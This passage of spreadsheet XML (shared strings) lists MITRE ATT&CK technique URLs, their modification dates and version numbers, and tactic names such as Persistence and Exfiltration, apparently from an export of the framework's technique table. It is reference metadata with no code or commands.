    <t>https://attack.mitre.org/techniques/T1588/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1201</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1120</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1647</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1057</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/015</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/014</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1572</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1620</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1219</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1018</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1091</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1496</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1207</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1014</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1029</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1113</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1594</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1648</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1129</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1072</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1518</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1518/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1608/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1528</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1539</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1649</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/014</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1082</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1614</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1614/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1016</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1016/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1049</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1529</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1124</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1080</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1221</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1537</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1127</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1127/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1199</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1535</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1125</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1047</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1220</t>
  </si>
  <si>
    <t>30 January 2020</t>
  </si>
  <si>
    <t>14 December 2017</t>
  </si>
  <si>
    <t>18 February 2020</t>
  </si>
  <si>
    <t>09 October 2019</t>
  </si>
  <si>
    <t>31 May 2017</t>
  </si>
  <si>
    <t>21 February 2020</t>
  </si>
  <si>
    <t>19 January 2020</t>
  </si>
  <si>
    <t>04 March 2022</t>
  </si>
  <si>
    <t>24 June 2020</t>
  </si>
  <si>
    <t>30 September 2020</t>
  </si>
  <si>
    <t>01 October 2020</t>
  </si>
  <si>
    <t>08 July 2022</t>
  </si>
  <si>
    <t>02 October 2020</t>
  </si>
  <si>
    <t>11 February 2020</t>
  </si>
  <si>
    <t>15 October 2020</t>
  </si>
  <si>
    <t>24 March 2022</t>
  </si>
  <si>
    <t>15 March 2020</t>
  </si>
  <si>
    <t>20 February 2020</t>
  </si>
  <si>
    <t>19 October 2020</t>
  </si>
  <si>
    <t>18 April 2018</t>
  </si>
  <si>
    <t>23 January 2020</t>
  </si>
  <si>
    <t>18 December 2020</t>
  </si>
  <si>
    <t>24 January 2020</t>
  </si>
  <si>
    <t>05 October 2021</t>
  </si>
  <si>
    <t>05 October 2020</t>
  </si>
  <si>
    <t>10 September 2019</t>
  </si>
  <si>
    <t>10 January 2020</t>
  </si>
  <si>
    <t>15 January 2020</t>
  </si>
  <si>
    <t>16 January 2018</t>
  </si>
  <si>
    <t>30 March 2021</t>
  </si>
  <si>
    <t>20 August 2020</t>
  </si>
  <si>
    <t>30 August 2019</t>
  </si>
  <si>
    <t>01 October 2021</t>
  </si>
  <si>
    <t>09 March 2020</t>
  </si>
  <si>
    <t>23 June 2020</t>
  </si>
  <si>
    <t>20 October 2020</t>
  </si>
  <si>
    <t>27 May 2022</t>
  </si>
  <si>
    <t>29 March 2021</t>
  </si>
  <si>
    <t>31 March 2021</t>
  </si>
  <si>
    <t>29 January 2020</t>
  </si>
  <si>
    <t>28 January 2020</t>
  </si>
  <si>
    <t>17 January 2020</t>
  </si>
  <si>
    <t>12 February 2020</t>
  </si>
  <si>
    <t>22 January 2021</t>
  </si>
  <si>
    <t>23 November 2020</t>
  </si>
  <si>
    <t>14 March 2019</t>
  </si>
  <si>
    <t>14 March 2020</t>
  </si>
  <si>
    <t>15 March 2019</t>
  </si>
  <si>
    <t>02 March 2020</t>
  </si>
  <si>
    <t>13 March 2020</t>
  </si>
  <si>
    <t>11 May 2021</t>
  </si>
  <si>
    <t>14 February 2020</t>
  </si>
  <si>
    <t>01 April 2022</t>
  </si>
  <si>
    <t>08 April 2019</t>
  </si>
  <si>
    <t>07 March 2019</t>
  </si>
  <si>
    <t>28 December 2020</t>
  </si>
  <si>
    <t>14 February 2019</t>
  </si>
  <si>
    <t>10 March 2020</t>
  </si>
  <si>
    <t>11 March 2020</t>
  </si>
  <si>
    <t>19 February 2020</t>
  </si>
  <si>
    <t>16 March 2020</t>
  </si>
  <si>
    <t>18 April 2019</t>
  </si>
  <si>
    <t>22 January 2020</t>
  </si>
  <si>
    <t>27 September 2022</t>
  </si>
  <si>
    <t>31 January 2019</t>
  </si>
  <si>
    <t>17 October 2018</t>
  </si>
  <si>
    <t>04 February 2020</t>
  </si>
  <si>
    <t>12 April 2019</t>
  </si>
  <si>
    <t>17 December 2020</t>
  </si>
  <si>
    <t>06 August 2021</t>
  </si>
  <si>
    <t>26 February 2020</t>
  </si>
  <si>
    <t>07 June 2021</t>
  </si>
  <si>
    <t>28 June 2020</t>
  </si>
  <si>
    <t>19 November 2021</t>
  </si>
  <si>
    <t>12 October 2021</t>
  </si>
  <si>
    <t>29 June 2020</t>
  </si>
  <si>
    <t>17 September 2020</t>
  </si>
  <si>
    <t>12 March 2020</t>
  </si>
  <si>
    <t>25 February 2022</t>
  </si>
  <si>
    <t>12 October 2020</t>
  </si>
  <si>
    <t>08 October 2021</t>
  </si>
  <si>
    <t>19 March 2020</t>
  </si>
  <si>
    <t>23 June 2021</t>
  </si>
  <si>
    <t>04 September 2019</t>
  </si>
  <si>
    <t>31 January 2020</t>
  </si>
  <si>
    <t>15 June 2022</t>
  </si>
  <si>
    <t>29 July 2022</t>
  </si>
  <si>
    <t>02 April 2019</t>
  </si>
  <si>
    <t>04 August 2021</t>
  </si>
  <si>
    <t>10 February 2020</t>
  </si>
  <si>
    <t>28 September 2022</t>
  </si>
  <si>
    <t>31 May 2022</t>
  </si>
  <si>
    <t>26 June 2020</t>
  </si>
  <si>
    <t>13 January 2022</t>
  </si>
  <si>
    <t>14 May 2020</t>
  </si>
  <si>
    <t>09 June 2020</t>
  </si>
  <si>
    <t>16 June 2020</t>
  </si>
  <si>
    <t>17 April 2019</t>
  </si>
  <si>
    <t>05 February 2020</t>
  </si>
  <si>
    <t>22 August 2022</t>
  </si>
  <si>
    <t>30 September 2022</t>
  </si>
  <si>
    <t>20 May 2021</t>
  </si>
  <si>
    <t>29 September 2022</t>
  </si>
  <si>
    <t>07 November 2019</t>
  </si>
  <si>
    <t>09 April 2022</t>
  </si>
  <si>
    <t>13 November 2019</t>
  </si>
  <si>
    <t>19 December 2019</t>
  </si>
  <si>
    <t>14 January 2020</t>
  </si>
  <si>
    <t>22 November 2021</t>
  </si>
  <si>
    <t>25 February 2020</t>
  </si>
  <si>
    <t>27 November 2019</t>
  </si>
  <si>
    <t>03 December 2019</t>
  </si>
  <si>
    <t>09 August 2022</t>
  </si>
  <si>
    <t>28 June 2019</t>
  </si>
  <si>
    <t>03 June 2021</t>
  </si>
  <si>
    <t>12 December 2019</t>
  </si>
  <si>
    <t>28 March 2022</t>
  </si>
  <si>
    <t>13 December 2019</t>
  </si>
  <si>
    <t>29 March 2019</t>
  </si>
  <si>
    <t>16 September 2019</t>
  </si>
  <si>
    <t>17 March 2021</t>
  </si>
  <si>
    <t>08 October 2019</t>
  </si>
  <si>
    <t>03 August 2022</t>
  </si>
  <si>
    <t>24 August 2020</t>
  </si>
  <si>
    <t>23 April 2021</t>
  </si>
  <si>
    <t>22 February 2021</t>
  </si>
  <si>
    <t>28 September 2021</t>
  </si>
  <si>
    <t>22 September 2021</t>
  </si>
  <si>
    <t>10 August 2020</t>
  </si>
  <si>
    <t>01 April 2021</t>
  </si>
  <si>
    <t>18 August 2021</t>
  </si>
  <si>
    <t>03 February 2020</t>
  </si>
  <si>
    <t>04 October 2019</t>
  </si>
  <si>
    <t>01 July 2020</t>
  </si>
  <si>
    <t>27 March 2020</t>
  </si>
  <si>
    <t>06 March 2020</t>
  </si>
  <si>
    <t>21 March 2022</t>
  </si>
  <si>
    <t>19 April 2022</t>
  </si>
  <si>
    <t>19 October 2022</t>
  </si>
  <si>
    <t>14 March 2022</t>
  </si>
  <si>
    <t>03 May 2022</t>
  </si>
  <si>
    <t>17 October 2021</t>
  </si>
  <si>
    <t>09 February 2021</t>
  </si>
  <si>
    <t>26 March 2020</t>
  </si>
  <si>
    <t>13 October 2021</t>
  </si>
  <si>
    <t>16 March 2021</t>
  </si>
  <si>
    <t>25 August 2022</t>
  </si>
  <si>
    <t>18 October 2022</t>
  </si>
  <si>
    <t>24 October 2022</t>
  </si>
  <si>
    <t>25 April 2022</t>
  </si>
  <si>
    <t>20 April 2022</t>
  </si>
  <si>
    <t>15 April 2021</t>
  </si>
  <si>
    <t>20 October 2022</t>
  </si>
  <si>
    <t>08 March 2022</t>
  </si>
  <si>
    <t>15 April 2022</t>
  </si>
  <si>
    <t>22 July 2022</t>
  </si>
  <si>
    <t>21 October 2022</t>
  </si>
  <si>
    <t>25 October 2022</t>
  </si>
  <si>
    <t>21 October 2020</t>
  </si>
  <si>
    <t>17 June 2022</t>
  </si>
  <si>
    <t>21 August 2020</t>
  </si>
  <si>
    <t>04 January 2022</t>
  </si>
  <si>
    <t>25 March 2020</t>
  </si>
  <si>
    <t>29 March 2020</t>
  </si>
  <si>
    <t>14 July 2020</t>
  </si>
  <si>
    <t>11 April 2022</t>
  </si>
  <si>
    <t>18 April 2022</t>
  </si>
  <si>
    <t>14 September 2022</t>
  </si>
  <si>
    <t>05 March 2021</t>
  </si>
  <si>
    <t>18 October 2021</t>
  </si>
  <si>
    <t>09 October 2020</t>
  </si>
  <si>
    <t>16 June 2022</t>
  </si>
  <si>
    <t>10 November 2020</t>
  </si>
  <si>
    <t>24 March 2020</t>
  </si>
  <si>
    <t>27 April 2021</t>
  </si>
  <si>
    <t>06 April 2021</t>
  </si>
  <si>
    <t>23 April 2020</t>
  </si>
  <si>
    <t>16 August 2021</t>
  </si>
  <si>
    <t>26 July 2021</t>
  </si>
  <si>
    <t>07 March 2022</t>
  </si>
  <si>
    <t>16 October 2021</t>
  </si>
  <si>
    <t>19 October 2021</t>
  </si>
  <si>
    <t>26 July 2022</t>
  </si>
  <si>
    <t>12 April 2021</t>
  </si>
  <si>
    <t>12 August 2021</t>
  </si>
  <si>
    <t>07 April 2022</t>
  </si>
  <si>
    <t>23 March 2020</t>
  </si>
  <si>
    <t>21 April 2022</t>
  </si>
  <si>
    <t>07 October 2021</t>
  </si>
  <si>
    <t>30 June 2022</t>
  </si>
  <si>
    <t>15 February 2022</t>
  </si>
  <si>
    <t>25 March 2022</t>
  </si>
  <si>
    <t>25 March 2021</t>
  </si>
  <si>
    <t>20 July 2022</t>
  </si>
  <si>
    <t>08 March 2021</t>
  </si>
  <si>
    <t>17 February 2022</t>
  </si>
  <si>
    <t>22 October 2020</t>
  </si>
  <si>
    <t>08 June 2021</t>
  </si>
  <si>
    <t>15 October 2021</t>
  </si>
  <si>
    <t>16 April 2022</t>
  </si>
  <si>
    <t>28 July 2022</t>
  </si>
  <si>
    <t>05 May 2022</t>
  </si>
  <si>
    <t>14 January 2022</t>
  </si>
  <si>
    <t>28 March 2020</t>
  </si>
  <si>
    <t>11 March 2022</t>
  </si>
  <si>
    <t>20 April 2021</t>
  </si>
  <si>
    <t>12 April 2022</t>
  </si>
  <si>
    <t>13 May 2020</t>
  </si>
  <si>
    <t>08 February 2022</t>
  </si>
  <si>
    <t>20 August 2021</t>
  </si>
  <si>
    <t>04 May 2022</t>
  </si>
  <si>
    <t>30 August 2022</t>
  </si>
  <si>
    <t>28 April 2022</t>
  </si>
  <si>
    <t>24 February 2022</t>
  </si>
  <si>
    <t>06 September 2022</t>
  </si>
  <si>
    <t>13 September 2021</t>
  </si>
  <si>
    <t>01 September 2020</t>
  </si>
  <si>
    <t>31 August 2022</t>
  </si>
  <si>
    <t>19 June 2020</t>
  </si>
  <si>
    <t>20 September 2021</t>
  </si>
  <si>
    <t>27 August 2021</t>
  </si>
  <si>
    <t>15 March 2022</t>
  </si>
  <si>
    <t>29 November 2021</t>
  </si>
  <si>
    <t>14 October 2021</t>
  </si>
  <si>
    <t>30 August 2021</t>
  </si>
  <si>
    <t>26 April 2021</t>
  </si>
  <si>
    <t>22 March 2022</t>
  </si>
  <si>
    <t>16 September 2020</t>
  </si>
  <si>
    <t>19 May 2022</t>
  </si>
  <si>
    <t>01 September 2022</t>
  </si>
  <si>
    <t>31 August 2021</t>
  </si>
  <si>
    <t>17 October 2022</t>
  </si>
  <si>
    <t>20 May 2022</t>
  </si>
  <si>
    <t>22 February 2022</t>
  </si>
  <si>
    <t>14 December 2021</t>
  </si>
  <si>
    <t>10 February 2022</t>
  </si>
  <si>
    <t>13 August 2020</t>
  </si>
  <si>
    <t>31 October 2022</t>
  </si>
  <si>
    <t>05 August 2022</t>
  </si>
  <si>
    <t>20 March 2020</t>
  </si>
  <si>
    <t>22 April 2021</t>
  </si>
  <si>
    <t>21 April 2021</t>
  </si>
  <si>
    <t>06 October 2022</t>
  </si>
  <si>
    <t>23 August 2022</t>
  </si>
  <si>
    <t>18 October 2020</t>
  </si>
  <si>
    <t>19 May 2020</t>
  </si>
  <si>
    <t>20 June 2020</t>
  </si>
  <si>
    <t>07 July 2022</t>
  </si>
  <si>
    <t>14 April 2022</t>
  </si>
  <si>
    <t>06 July 2022</t>
  </si>
  <si>
    <t>27 July 2021</t>
  </si>
  <si>
    <t>26 October 2022</t>
  </si>
  <si>
    <t>11 December 2020</t>
  </si>
  <si>
    <t>29 January 2022</t>
  </si>
  <si>
    <t>27 October 2022</t>
  </si>
  <si>
    <t>28 July 2021</t>
  </si>
  <si>
    <t>05 November 2020</t>
  </si>
  <si>
    <t>22 September 2022</t>
  </si>
  <si>
    <t>25 August 2021</t>
  </si>
  <si>
    <t>15 July 2022</t>
  </si>
  <si>
    <t>12 January 2022</t>
  </si>
  <si>
    <t>07 February 2020</t>
  </si>
  <si>
    <t>17 June 2020</t>
  </si>
  <si>
    <t>26 August 2021</t>
  </si>
  <si>
    <t>05 April 2021</t>
  </si>
  <si>
    <t>1.0</t>
  </si>
  <si>
    <t>2.0</t>
  </si>
  <si>
    <t>1.1</t>
  </si>
  <si>
    <t>2.3</t>
  </si>
  <si>
    <t>1.2</t>
  </si>
  <si>
    <t>1.3</t>
  </si>
  <si>
    <t>2.4</t>
  </si>
  <si>
    <t>2.1</t>
  </si>
  <si>
    <t>2.2</t>
  </si>
  <si>
    <t>1.4</t>
  </si>
  <si>
    <t>3.2</t>
  </si>
  <si>
    <t>1.5</t>
  </si>
  <si>
    <t>1.6</t>
  </si>
  <si>
    <t>3.0</t>
  </si>
  <si>
    <t>3.1</t>
  </si>
  <si>
    <t>3.4</t>
  </si>
  <si>
    <t>2.5</t>
  </si>
  <si>
    <t>Defense Evasion, Privilege Escalation</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>Collection, Credential Access</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Defense Evasion, Discovery</t>
  </si>
  <si>
    <t>Defense Evasion, Execution</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Initial Access, Persistence</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Credential Access, Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Credential Access, Discovery</t>
  </si>
  <si>
    <t>Initial Access, Lateral Movement</t>
  </si>
  <si>
